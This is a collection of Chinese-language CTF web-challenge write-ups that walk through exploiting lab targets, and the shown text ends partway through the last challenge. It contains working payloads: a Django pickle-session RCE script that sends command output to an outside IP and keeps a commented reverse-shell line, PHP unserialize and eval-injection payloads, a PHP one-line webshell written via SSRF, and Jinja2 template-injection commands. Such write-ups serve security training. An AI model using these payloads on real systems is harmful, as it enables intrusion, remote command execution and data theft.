  1324. 题目内容:c62s的生日礼物
  1325. 题目writeup:
  1326. 启动题目场景,获得靶场网站,访问网站,发现是一张图片,并且查看源码是base64形式加密的图片,并没有可利用点
  1327. http://c976760b0e164d6db6d4d5bb036c3d9a8ae45466bf1e43ca.changame.ichunqiu.com/
  1328. view-source:http://c976760b0e164d6db6d4d5bb036c3d9a8ae45466bf1e43ca.changame.ichunqiu.com/
  1329. 通过御剑目录扫描工具对其进行扫描,发现存在admin目录
  1330. 访问admin目录页面发现是hello admin内容,并没有可利用点
  1331. http://c976760b0e164d6db6d4d5bb036c3d9a8ae45466bf1e43ca.changame.ichunqiu.com/admin/
  1332. 通过get请求访问主页,然后对其抓包请求,也没发现可利用点
  1333. 参数将get请求方法修改为post.响应页面里面报错DEBUG=True.看起来和python的
  1334. Django异常出错有关。
  1335. 根据题目内容提示
  1336. c62s的生日礼物,这里我们去github搜索关键字c62s,找到一个用户名c62s
  1337. 打开进入后确实存在一个python的django项目并且也是gitt.zip的压缩包,该压缩包名字也和题目名称相同,那就证实这个项目就是我们要找到的东西
  1338. 对压缩包进行解压,发现需要输入密码
  1339. 在项目中有提示“你要知道我的生日才能打开礼物”,那就说明密码为该项目人的生日
  1340. 那么我需要生成一个生成生日字典
  1341. 使用ziperello对zip压缩包加载生成的密码字典进行爆破,
  1342. 最终密码是20001111
  1343. 通过
  1344. 20001111作为解压密码对压缩包进行解压得到SECRET_KEY.KEY文件,打开文件得到一个key值
  1345. oa4$kkk802=rfm@tl^e5yb3qvs_ea3r!m*&j+#_+s-9=xcieci
  1346. 看到Key文件可以联想到Django的反序列化漏洞
  1347. 参考
  1348. http://blog.nsfocus.net/django-code-execution-vulnerability/ 此文章构造POC,执行脚本前需使用pip安装Django1.5版本以下。修改相关参数生成session。
  1349. 我这里用的Django-1.4.22
  1350. 执行下面脚本生成 命令whoami的反序化的session值:
  1351. import osos.environ.setdefault('DJANGO_SETTINGS_MODULE','settings')from django.conf import settingsfrom django.core import signingfrom django.contrib.sessions.backends import signed_cookiessettings.configure(SECRET_KEY='oa4$kkk802=rfm@tl^e5yb3qvs_ea3r!m*&j+#_+s-9=xcieci')class Run(object): def __reduce__(self): # return (os.system,('touch /tmp/xxlegend.log',)) # return (os.system,('bash -i >& /dev/tcp/74.121.150.85/9999 0>&1',)) # return (os.system,('echo 111 > D:/1.txt',)) import subprocess # return (subprocess.call, # (['python','-c', # 'import os,binascii;s=binascii.hexlify(os.popen("whoami").read().strip());' # 'cmd="ping -c 1" + s + ".xxxx.dnslog.link";' # 'os.popen(cmd)' # ],)) return (subprocess.call, (['python','-c', 'import os,socket;print "xxx";c=os.popen("whoami").read().strip();s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM);s.sendto(c, ("36.111.20.223",2333));' ],)) # return (subprocess.call, # (['python','-c', # 'import os,binascii;s=binascii.hexlify(os.popen("whoami").read().strip());' # 'cmd="ping -c 1 -p " + s + "www.baidu.com";' # 'os.popen(cmd)' # ],))sess = signing.dumps(Run(), serializer=signed_cookies.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')print sess
  1352. 得到session值:
  1353. gAJjc3VicHJvY2VzcwpjYWxsCnEBXXECKFUGcHl0aG9ucQNVAi1jcQRVmWltcG9ydCBvcyxzb2NrZXQ7cHJpbnQgInh4eCI7Yz1vcy5wb3Blbigid2hvYW1pIikucmVhZCgpLnN0cmlwKCk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19ER1JBTSk7cy5zZW5kdG8oYywgKCIzNi4xMTEuMjAuMjIzIiwgMjMzMykpO3EFZYVScQYu:1mEkfh:PB_yRkY2dTK19TUZr4SH5WIdAlI
  1354. 在自己的公网VPS监听udp 2333端口(
  1355. 经过测试目标靶机系统已经禁用了TCP协议,因此curl和wget和bash都不能用,这里用UDP协议反弹NC):
  1356. nc -luv 2333
  1357. get请求访问admin目录,然后bupsuit抓包获取
  1358. 这里cookie中的sessioid里面的值替换成python脚本生成的反序化值,然后发送请求,http响应显示发生错误信息
  1359. 并在NC监听端口中显示了执行目标系统命令whomai的回显为root
  1360. 执行下面脚本生成命令ls -al的反序化的session值
  1361. 得到的session值:gAJjc3VicHJvY2VzcwpjYWxsCnEBXXECKFUGcHl0aG9ucQNVAi1jcQRVmGltcG9ydCBvcyxzb2NrZXQ7cHJpbnQgInh4eCI7Yz1vcy5wb3BlbigibHMgLWFsIikucmVhZCgpLnN0cmlwKCk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19ER1JBTSk7cy5zZW5kdG8oYywgKCIzNi4xMTEuMjAuMjIzIiwyMzMzKSk7cQVlhVJxBi4:1mElFq:LMy5FHGziZgGZwmfD6nQqhD7waQ
  1362. 可以看到在NC监听命令中显示出目标靶机系统存在flag.txt文件。
  1363. 执行下面脚本生成命令cat flag.txt
  1364. 的反序化的session值
  1365. 得到session值:gAJjc3VicHJvY2VzcwpjYWxsCnEBXXECKFUGcHl0aG9ucQNVAi1jcQRVnmltcG9ydCBvcyxzb2NrZXQ7cHJpbnQgInh4eCI7Yz1vcy5wb3BlbigiY2F0IGZsYWcudHh0IikucmVhZCgpLnN0cmlwKCk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19ER1JBTSk7cy5zZW5kdG8oYywgKCIzNi4xMTEuMjAuMjIzIiwyMzMzKSk7cQVlhVJxBi4:1mElJa:UbVTZP6gY5-lWbQlKDA6NuTCqQs
  1366. 最终得到flag:
  1367. flag{8ae9c523-33f3-4946-855c-1e015412c005}
  1368. 题目名称:fuzzing
  1369. 题目内容:there is noting
  1370. 题目writeup:
  1371. 启动题目场景,获得靶场网站,访问网站,在页面中显示“there is nothing"
  1372. http://32987757c2bb4ecc80d2e03f8889ca8afa8770dad25f4266.changame.ichunqiu.com/Challenges/test.php
  1373. 这里get请求访问靶场网站的
  1374. Challenges/test.php页面,通过bupsuit对其抓包,并发送请求,在http响应头部中显示内容“hint: ip,Large internal network”中文为:最大的内网网段IP,那就是10.0.0.0网段
  1375. 并暗示我们需要伪造内网IP进行请求,这里
  1376. 使用X-Forwarded-For进行伪造,所以我们随便伪造10.0.0.0网段的一个IP地址,这里伪造10.0.0.1
  1377. X-Forwarded-For:10.0.0.1
  1378. 发送请求,在http响应头部中出现了Location: ./m4nage.php
  1379. 那么我们get 请求访问./m4nage.php页面,在响应页面中显示“show me your key”,意思需要提供key值,这里将
  1380. key值赋值为1
  1381. 那么构造
  1382. /Challenges/./m4nage.php?key=1,get方法发送请求,发现get请求方法不行
  1383. 那么将get请求方法修改为post方法提交,在响应页面中显示了一些内容
  1384. 得到的内容:
  1385. key is not right,md5(key)==="1b4167610ba3f2ac426a68488dbd89be",and the key is ichunqiu***,the * is in [a-z0-9] 告诉我们key不正确,并且对key 值进行md5加密生成的值等于
  1386. 1b4167610ba3f2ac426a68488dbd89be,也告诉了key值的部分值为ichunqiu
  1387. 这里通过脚本跑出key值:
  1388. import hashlibdef md5(data): m = hashlib.md5() m.update(data) n = m.hexdigest() return nx = 'abcdefghijklmnopqrstuvwxyz1234567890'test = 'ichunqiu'for a in x: for b in x: for c in x: if md5(test + a + b + c) == '1b4167610ba3f2ac426a68488dbd89be': print test + a + b + c执行脚本后,得到key
  1389. 得到KEY值为:ichunqiu105
  1390. 将post中key的参数修改为ichunqiu105,并发送请求,在http响应包中显示“the next step: xx00xxoo.php”,下一步请求访问xx00xxoo.php
  1391. post请求访问
  1392. xx00xxoo.php,在http响应页面中显示了一些内容。
  1393. 得到的响应内容为:
  1394. source code is in the x0.txt.Can you guess the key
  1395. the authcode(flag) is 58e6GPQcKHY8JSGafldNziBAjUQ841Oz/11SuAgbmBfsieCE6P+ry8VFNVzWT72F/O3cLegmIiQx6CgLjuILyADMYrTVLQc
  1396. 告诉我们需要访问x0.txt,然后加密的falg的hash值,需要加密的key才能解密出flag,这里的 key值猜测是
  1397. ichunqiu105
  1398. get请求访问
  1399. x0.txt,在响应页面中得到一块php的代码。
  1400. 得到php代码,看起来就是一段flag加密的函数:
  1401. function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
  1402.     $ckey_length = 4;
  1403.     $key = md5($key ? $key : UC_KEY);
  1404.     $keya = md5(substr($key, 0, 16));
  1405.     $keyb = md5(substr($key, 16, 16));
  1406.     $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
  1407.     $cryptkey = $keya . md5($keya . $keyc);
  1408.     $key_length = strlen($cryptkey);
  1409.     $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
  1410.     $string_length = strlen($string);
  1411.     $result = '';
  1412.     $box = range(0, 255);
  1413.     $rndkey = array();
  1414.     for ($i = 0; $i <= 255; $i++) {
  1415.         $rndkey[$i] = ord($cryptkey[$i % $key_length]);
  1416.     }
  1417.     for ($j = $i = 0; $i < 256; $i++) {
  1418.         $j = ($j + $box[$i] + $rndkey[$i]) % 256;
  1419.         $tmp = $box[$i];
  1420.         $box[$i] = $box[$j];
  1421.         $box[$j] = $tmp;
  1422.     }
  1423.     for ($a = $j = $i = 0; $i < $string_length; $i++) {
  1424.         $a = ($a + 1) % 256;
  1425.         $j = ($j + $box[$a]) % 256;
  1426.         $tmp = $box[$a];
  1427.         $box[$a] = $box[$j];
  1428.         $box[$j] = $tmp;
  1429.         $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
  1430.     }
  1431.     if ($operation == 'DECODE') {
  1432.         if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
  1433.             return substr($result, 26);
  1434.         } else {
  1435.             return '';
  1436.         }
  1437.     } else {
  1438.         return $keyc . str_replace('=', '', base64_encode($result));
  1439.     }
  1440. }
  1441. 那么重新整理出解密falg的php代码,在代码末尾添加一句echo将结果输出看下,并且将flag密文和ichunqiu105传入。
  1442. <?php
  1443. function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
  1444. $ckey_length = 4;
  1445. $key = md5($key ? $key : UC_KEY);
  1446. $keya = md5(substr($key, 0, 16));
  1447. $keyb = md5(substr($key, 16, 16));
  1448. $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
  1449. $cryptkey = $keya . md5($keya . $keyc);
  1450. $key_length = strlen($cryptkey);
  1451. $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
  1452. $string_length = strlen($string);
  1453. $result = '';
  1454. $box = range(0, 255);
  1455. $rndkey = array();
  1456. for ($i = 0; $i <= 255; $i++) {
  1457. $rndkey[$i] = ord($cryptkey[$i % $key_length]);
  1458. }
  1459. for ($j = $i = 0; $i < 256; $i++) {
  1460. $j = ($j + $box[$i] + $rndkey[$i]) % 256;
  1461. $tmp = $box[$i];
  1462. $box[$i] = $box[$j];
  1463. $box[$j] = $tmp;
  1464. }
  1465. for ($a = $j = $i = 0; $i < $string_length; $i++) {
  1466. $a = ($a + 1) % 256;
  1467. $j = ($j + $box[$a]) % 256;
  1468. $tmp = $box[$a];
  1469. $box[$a] = $box[$j];
  1470. $box[$j] = $tmp;
  1471. $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
  1472. }
  1473. if ($operation == 'DECODE') {
  1474. if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
  1475. return substr($result, 26);
  1476. } else {
  1477. return '';
  1478. }
  1479. } else {
  1480. return $keyc . str_replace('=', '', base64_encode($result));
  1481. }
  1482. }
  1483. echo authcode("58e6GPQcKHY8JSGafldNziBAjUQ841Oz/11SuAgbmBfsieCE6P+ry8VFNVzWT72F/O3cLegmIiQx6CgLjuILyADMYrTVLQc", $operation = 'DECODE', $key = 'ichunqiu105', $expiry = 0)
  1484. ?>
  1485. 执行php得到:
  1486. 最终得到flag:
  1487. flag{fa572c92-c96a-4a2c-9c58-ba84e01898ad}
  1488. 题目名称:Hash
  1489. 题目内容:这只是第一步,然后呢?
  1490. 题目writeup:
  1491. 启动题目场景,获得靶场网站,访问网站,发现页面显示一个超链接
  1492. http://d4aec9123e9b475a89be5b435cf82a1ac8e927256219481c.changame.ichunqiu.com/
  1493. 点击超链接,页面显示“
  1494. you are 123;if you are not 123,you can get the flag”,表示 key的值不能为123,否则不能得到flag
  1495. http://d4aec9123e9b475a89be5b435cf82a1ac8e927256219481c.changame.ichunqiu.com/index.php?key=123&hash=f9109d5f83921a551cf859f853afe7bb
  1496. 并查看源代码在注释页面中有显示“
  1497. $hash=md5($sign.$key);the length of $sign is 8”,告诉hash值为md5($sign.$key)且sign长度为8 view-source:http://d4aec9123e9b475a89be5b435cf82a1ac8e927256219481c.changame.ichunqiu.com/index.php?key=123&hash=f9109d5f83921a551cf859f853afe7bb
  1498. 这里将key设置为124满足能获取flag的key的值,继续访问,页面显示"the hash is not right",说明hash值不对
  1499. http://d4aec9123e9b475a89be5b435cf82a1ac8e927256219481c.changame.ichunqiu.com/index.php?key=124&hash=f9109d5f83921a551cf859f853afe7bb
  1500. 根据上文注释中hash值:hash=md5($sign.$key)=md5($sing.124)
  1501. 这里我们将链接中错误的hash值
  1502. f9109d5f83921a551cf859f853afe7bb进行md5解密
  1503. 得到:
  1504. kkkkkk01123
  1505. 那么$sing=kkkkkk01(满足长度为8位)
  1506. 于是正确的hash值:
  1507. hash=md5(kkkkkk01124)=168a1bca9081fcfccd524ae21a76a7fb
  1508. 访问以下构造的链接地址:
  1509. http://d4aec9123e9b475a89be5b435cf82a1ac8e927256219481c.changame.ichunqiu.com/index.php?key=124&hash=77dab7fc0322d9b23ccd6f2e95a065ba
  1510. 页面内容显示:next step is Gu3ss_m3_h2h2.php ,意思是下一步访问 Gu3ss_m3_h2h2.php 页面
  1511. 访问
  1512. Gu3ss_m3_h2h2.php页面,页面显示了一块php的源码:
  1513. http://d4aec9123e9b475a89be5b435cf82a1ac8e927256219481c.changame.ichunqiu.com/Gu3ss_m3_h2h2.php
  1514. 得到
  1515. Gu3ss_m3_h2h2.php的源码:
  1516. <?php
  1517. class Demo {
  1518.     private $file = 'Gu3ss_m3_h2h2.php';
  1519.     public function __construct($file) {
  1520.         $this->file = $file;
  1521.     }
  1522.     function __destruct() {
  1523.         echo @highlight_file($this->filetrue);
  1524.     }
  1525.     function __wakeup() {
  1526.         if ($this->file != 'Gu3ss_m3_h2h2.php') {
  1527.             //the secret is in the f15g_1s_here.php
  1528.             $this->file = 'Gu3ss_m3_h2h2.php';
  1529.         }
  1530.     }
  1531. }
  1532. if (isset($_GET['var'])) {
  1533.     $var = base64_decode($_GET['var']);
  1534.     if (preg_match('/[oc]:\d+:/i', $var)) {
  1535.         die('stop hacking!');
  1536.     } else {
  1537.         @unserialize($var);
  1538.     }
  1539. else {
  1540.     highlight_file("Gu3ss_m3_h2h2.php");
  1541. }
  1542. ?>
  1543. 源码内容是php反序列化操作,由此可见是利用的PHP反序列化漏洞,下一步我们就是要通过这个存在序列化漏洞的页面构造语法来获取the f15g_1s_here.php的源码:
  1544. 1.看到wakeup()函数,想到了这是序列化的漏洞,wakeup()一旦执行就会调用反序列化函数,了绕过wakeup()我们将数据的属性值大于真实值即可。还有对/[oc]:\d+:/i,这个正则表达式的绕过,我们只需要将:5:变成这种形式:+5:即可绕过正则表达式的匹配。
  1545. 最终的秘密在f15g_1s_here.php里面,先将f15g_1s_here.php作为参数传入Demo9函数,将整个函数实例化赋值给变量a,再序列化变量a,绕过正则,绕过wakeup函数,最后再进行base64编码。
  1546. 大意是用get方式传递var参数,先对它base64解码,接着正则匹配,然后对其反序列化。在反序列化时,wakeup这个函数使得我们传进去的文件名f15g_1s_here.php变成Gu3ss_m3_h2h2.php了,
  1547. 想要读取f15g_1s_here.php,需要绕过它。(具体见之前写的一篇反序列化中__wakeup()函数漏洞)
  1548. 对于用'+'绕过正则,参考了这篇文章,链接https://xz.aliyun.com/t/2733
  1549. 所以,构造的序列化代码如下: 
  1550. <?php
  1551. class Demo {
  1552. private $file = 'Gu3ss_m3_h2h2.php';
  1553. public function __construct($file) {
  1554. $this->file = $file;
  1555. }
  1556. function __destruct() {
  1557. echo @highlight_file($this->file, true);
  1558. }
  1559. function __wakeup() {
  1560. if ($this->file != 'Gu3ss_m3_h2h2.php') {
  1561. //the secret is in the f15g_1s_here.php
  1562. $this->file = 'Gu3ss_m3_h2h2.php';
  1563. }
  1564. }
  1565. }
  1566. $a = new Demo('f15g_1s_here.php');
  1567. $s = serialize($a);
  1568. echo $s;
  1569. echo '<br>';
  1570. $s = str_replace('O:4', 'O:+4',$s);//绕过正则
  1571. $s = str_replace(':1:', ':2:' ,$s);//绕过wakeup函数
  1572. echo base64_encode($s);//最后base64编码
  1573. ?>执行php后得到反序化值:
  1574. 得出序列化之后的文件base64编码:
  1575. TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ==
  1576. 序列化的payload:
  1577. Gu3ss_m3_h2h2.php?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ==
  1578. 访问构造的反序化poc,可在页面获得f15g_1s_here.php的源码:http://d4aec9123e9b475a89be5b435cf82a1ac8e927256219481c.changame.ichunqiu.com/Gu3ss_m3_h2h2.php?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ==
  1579. f15g_1s_here.php 源码:
  1580. <?php
  1581. if (isset($_GET['val'])) {
  1582.     $val = $_GET['val'];
  1583.     eval('$value="' . addslashes($val) . '";');
  1584. else {
  1585.     die('hahaha!');
  1586. }
  1587. ?>
  1588. 代码中要求我们以get的方式传递一个val参数,对这个参数进行添加反斜杠的过滤方式。addslashes()函数会对单引号,双引号,反斜杠,以及%0,添加反斜杠。
  1589. 接下来就是利用上面的eval()函数来执行ls命令,列出靶机系统当前目录存在的文件,它将传进去的参数转义处理,然后执行,这里val是可控的,所以构造payload:
  1590. f15g_1s_here.php?val=${eval("echo 'ls' ;")}
  1591. 访问页面显示是空白没有任何内容。
  1592. http://d4aec9123e9b475a89be5b435cf82a1ac8e927256219481c.changame.ichunqiu.com/f15g_1s_here.php?val=${eval(%22echo%20%27ls%27%20;%22)}
  1593. 但是addslashes对单引号,双引号,反斜杠进行了转义,所以只能用反引号(`)。而且反斜杠被转义了,使用不了引号嵌套。所以想到再利用一次get请求。payload如下:
  1594. f15g_1s_here.php?val=${eval($_GET[a])}&a=echo `ls`;//注意最后的分号
  1595. http://d4aec9123e9b475a89be5b435cf82a1ac8e927256219481c.changame.ichunqiu.com/f15g_1s_here.php?val=${eval($_GET[a])}&a=echo%20`ls`;
  1596. 得到一个True_F1ag_i3_Here_233.php
  1597. 文件
  1598. 进行通过cat查看True_F1ag_i3_Here_233.php内容,访问下面链接后,页面是空白的。
  1599. f15g_1s_here.php?val=${eval($_GET[a])}&a=echo `cat True_F1ag_i3_Here_233.php`; http://d4aec9123e9b475a89be5b435cf82a1ac8e927256219481c.changame.ichunqiu.com/f15g_1s_here.php?val=${eval($_GET[a])}&a=echo%20`cat%20True_F1ag_i3_Here_233.php`;
  1600. 进行源码查看页面,发现包含了 flag的内容
  1601. view-source:http://d4aec9123e9b475a89be5b435cf82a1ac8e927256219481c.changame.ichunqiu.com/f15g_1s_here.php?val=${eval($_GET[a])}&a=echo%20`cat%20True_F1ag_i3_Here_233.php`;
  1602. 或者
  1603. 下面是用一句话直接执行命令
  1604. f15g_1s_here.php?val=${eval($_POST[a])
  1605. }
  1606. http://1401d6806aac45b7a87007edcc4fdda7727d1bdd535a4e40.changame.ichunqiu.com/f15g_1s_here.php?val=${eval($_POST[a])}
  1607. 通过蚁剑连接一句话木马,并查看到flag内容
  1608. 最终得到falg:
  1609. flag{b004328a-5f6e-4029-98e6-34eeadc00e7f}
  1610. 题目名称:Look
  1611. 题目内容:
  1612. 我看的见你,你却看不见我。(非隐写)
  1613. tips:sql injection
  1614. tips2: mysql 字符集
  1615. 题目writeup:
  1616. 启动题目场景,获得靶场网站,访问网站,发现页面是空白。
  1617. 访问主页,并通过bupsuit对其抓包,并发送请求,发现在http响应头中有特殊字符“x-HT:verify",告诉我们HT实际是hite的简称,隐藏了参数
  1618. verify
  1619. 既然隐藏了
  1620. verify变量参数,那么我们构造get请求为 /?verify=1,并发送请求,在响应页面中显示“verify error!!"
  1621. GET /?verify=1
  1622. 继续构造
  1623. /?verify=admin发送get请求,在响应页面显示“verify long!!”,说明verify变量存在注入
  1624. 构造'or 1%23 显示
  1625. verify error,证明是过滤空格了
  1626. 经过本地测试,发现
  1627. '*1%23
  1628. '%1%23
  1629. '=0# 都为真。
  1630. 这里构造get请求/?verify='%1%23 ,发送请求,在响应页面显示“next page 5211ec9dde53ee65bb02225117fba1e1.php”告诉我们下一步是访问5211ec9dde53ee65bb02225117fba1e1.php页面。
  1631. get请求
  1632. 5211ec9dde53ee65bb02225117fba1e1.php,发送请求,在响应页面显示hello,头部X-HT: viminfo,这可能告诉我们文件是vim被编辑过或者编辑后得到的隐藏文件。
  1633. 这里使用
  1634. dirsearch.py对目标靶机进行扫描,发现扫描出.viminfo文件
  1635.  python3 dirsearch.py  -u  http://b11bc52c08034fb3a08abb6bee1631f8f20f597b0
  1636. 访问
  1637. .viminfo文件,得到 一个备份文件5211ec9dde53ee65bb02225117fba1e1.php.backup~~~
  1638. 以及它的物理路径
  1639. http://b11bc52c08034fb3a08abb6bee1631f8f20f597b0b244b41.changame.ichunqiu.com/
  1640. .viminfo
  1641. 这里访问
  1642. 5211ec9dde53ee65bb02225117fba1e1.php.backup~~~
  1643. 文件,注意文件名后还有~~,而不是5211ec9dde53ee65bb02225117fba1e1.php.backup。得到5211ec9dde53ee65bb02225117fba1e1.php源码
  1644. http://b11bc52c08034fb3a08abb6bee1631f8f20f597b0b244b41.changame.ichunqiu.com/5211ec9dde53ee65bb02225117fba1e1.php.backup~~~
  1645. 5211ec9dde53ee65bb02225117fba1e1.php源码为:
  1646. <?php
  1647. $con = mysql_connect('localhost','root','');
  1648. mysql_query("set names utf8");
  1649. mysql_select_db("ctf");
  1650. if($_SERVER["REMOTE_ADDR"]=='8.8.8.8'){
  1651. $name = addslashes($_GET['usern3me']);//对输入转义
  1652. }
  1653. else{
  1654. if(stripos($_GET['usern3me'],'Bctf2O16')!==false){ //不区分大小写寻找BCt2016
  1655. $name = 'FUCK';
  1656. }
  1657. else{
  1658. $name = addslashes($_GET['usern3me']);
  1659. }
  1660. }
  1661. echo 'hello '.$name;
  1662. $sql = "select * from admin where name='$name'";
  1663. $result = mysql_query($sql);
  1664. $num = mysql_num_rows($result);
  1665. if($num>0){
  1666. echo '<br>next ***.php';
  1667. }
  1668. ?>
  1669. 其中第一个if判断远程IP只是一个幌子无法伪造
  1670. 接着看程序逻辑,需要输入非 Bctf2O(大写O)16但进入数据库查询又当作是Bctf2O16的一个字符串
  1671. 这里利用一个mysql的字符编码特性:
  1672. MYSQL 中 utf8_unicode_ci 和 utf8_general_ci 两种编码格式, utf8_general_ci不区分大小写,
  1673. Ä = A, Ö = O, Ü = U 这三种条件都成立, 对于utf8_general_ci下面的等式成立:ß = s ,但是,对于utf8_unicode_ci下面等式才成立:ß = ss 。
  1674. 因此ç=c或者ô=o
  1675. 于是访问:
  1676. http://b11bc52c08034fb3a08abb6bee1631f8f20f597b0b244b41.changame.ichunqiu.com/5211ec9dde53ee65bb02225117fba1e1.php?usern3me=Bctf2O16
  1677. 页面内容显示“heelo fuck"显然没有被绕过
  1678. 这里将Bctf2O16修改为Bçtf2O16访问http://b11bc52c08034fb3a08abb6bee1631f8f20f597b0b244b41.changame.ichunqiu.com/5211ec9dde53ee65bb02225117fba1e1.php?usern3me=B%C3%A7tf2O16在页面中显示了c3368f5eb5f8367fd548b228bee69ef2.php内容,告诉我们下一步应该访问该文件
  1679. 访问c3368f5eb5f8367fd548b228bee69ef2.php文件,得到其源码
  1680. http://b11bc52c08034fb3a08abb6bee1631f8f20f597b0b244b41.changame.ichunqiu.com/c3368f5eb5f8367fd548b228bee69ef2.php
  1681. c3368f5eb5f8367fd548b228bee69ef2.php源码:
  1682. <?phpif(isset($_GET['path']) && isset($_GET['filename'])){    $path = $_GET['path'];    $name = "upload/".$_GET['filename'];}else{    show_source(__FILE__);    exit();}if(strpos($name,'..') > -1){ //从$name 寻找..  所以想通过../的方法去变量的不可行的    echo 'WTF';    exit();}if(strpos($path,'http://127.0.0.1/') === 0){ //$path 必须以http://127.0.0.1/ 开头    file_put_contents($name,file_get_contents($path));  //这里是http协议就直接读出返回是数据,然后写入文件里面,我开始想的是php文件流去干事情,但是前面一关条件限制死了,如果没有前面那个条件,我觉得可以用php://input 来命令执行}else{    echo 'path error';}?>
  1683. http://127.0.0.1/下的文件就是目标靶机网站下的文件
  1684. 为了弄清怎么构造POC,于是就在本地做了一个测试,测试代码如下:
  1685. ttest
  1686. .php
  1687. <?php
  1688. if(isset($_GET['path']) && isset($_GET['filename'])){
  1689.     $path = $_GET['path'];
  1690.     $name = $_GET['filename'];
  1691. }
  1692. file_put_contents($name,file_get_contents($path));
  1693. ?>
  1694. test.php
  1695. <?php
  1696. $name=$_GET[1];
  1697. echo 'hello '.$name;
  1698. ?>
  1699. 我们在本地访问这个url:
  1700. http://127.0.0.1/ttest.php?filename=1234.php&path=test.php
  1701. 这时候是把test.php文件的内容写到了1234.php里面:
  1702. 如果path前面加上http://127.0.0.1,
  1703. 写入的内容变成了hello。
  1704. 这是为什么呢?如果我们不加http://127.0.0.1,我们相当于访问的是我们自己的文件系统,也就是直接访问到test.php的内容。
  1705. 如果我们加上了http://127.0.0.1,访问得到的内容可以理解成curl这个链接得到的内容,也就是我们的响应头里的内容,应该是这个页面的源码:
  1706. 因为上个页面的usern3me的内容是我们可控的,
  1707. 因此,我们可以直接将一句话写入到
  1708. filename
  1709. =后的文件中。POC为:
  1710. http://127.0.0.1/ttest.php?filename=1.php&path=http://127.0.0.1/5211ec9dde53ee65bb02225117fba1e1.php?usern3me=<?php%2520eval($_POST[feng]);?> //这里空格需要用%2520分割
  1711. 根据以上测试原理,本题我们可以构造为:
  1712. http://b11bc52c08034fb3a08abb6bee1631f8f20f597b0b244b41.changame.ichunqiu.com/c3368f5eb5f8367fd548b228bee69ef2.php?filename=bk.php&path=http://127.0.0.1/5211ec9dde53ee65bb02225117fba1e1.php?usern3me=<?php%2520eval($_POST[0]);?>
  1713. 那么就将一句话写入到
  1714. bk.php中,通过c3368f5eb5f8367fd548b228bee69ef2.php上文源码分析,我们上传的文件保存到upload目录下
  1715. 那么一句话的访问路径为:
  1716. http://b11bc52c08034fb3a08abb6bee1631f8f20f597b0b244b41.changame.ichunqiu.com/upload/bk.php
  1717. 通过蚁剑链接一句话
  1718. 成功链接,得到flag的内容
  1719. 最终flag为:
  1720. flag{480ebe9f-86c4-42d0-8427-3dc11d6cf1c7}
  1721. 题目名称:Fuzz
  1722. 题目内容:Can you?
  1723. 题目writeup:
  1724. 启动题目场景,获得靶场网站,访问网站,发现页面显示内容“plz fuzz parameter”,告诉我们需要fuzz参数变量
  1725. 通过抓包我们对其fuzz变量
  1726. GET /?§xxx§ HTTP/1.1
  1727. Host: 713f80a92b1c492783d6241ae10088fb6fef8a5a93ec4302.changame.ichunqiu.com
  1728. User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1
  1729. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  1730. Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
  1731. Accept-Encoding: gzip, deflate
  1732. Cookie: name="{{ config['RUNCMD']('python /tmp/get.py'\054shell=True) }}"; __jsluid_h=6fb91d4763af41c45644fd191e7919be
  1733. Connection: close
  1734. fuzz出变量为name
  1735. 那么构造参数变量访问:
  1736. http://713f80a92b1c492783d6241ae10088fb6fef8a5a93ec4302.changame.ichunqiu.com/?name=1
  1737. 访问robots.txt,发现是一条蛇,猜测是与python有关
  1738. 测试该页面是否存在模板注入,输入
  1739. {{11-2}},发现页面内容显示计算出9,那么是存在pyhton的模板注入。
  1740. http://713f80a92b1c492783d6241ae10088fb6fef8a5a93ec4302.changame.ichunqiu.com/?name={{11-2}}
  1741. 通过百度搜索发现该题存在jinja2代码执行漏洞:
  1742. 方法一:
  1743. 寻找可用引用类型(通过父类来找其中任意一个子类的引用列表),可以看到calss类为type file在列表40的位置
  1744. http://713f80a92b1c492783d6241ae10088fb6fef8a5a93ec4302.changame.ichunqiu.com/?name={{%27%27.__class__.__mro__[2].__subclasses__()}}
  1745. 写入一个配置文件owned.cfg到tmp目录下,然后该配置文件可以启用RUNCMD 可执行命令功能
  1746. http://713f80a92b1c492783d6241ae10088fb6fef8a5a93ec4302.changame.ichunqiu.com/?name={{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/owned.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
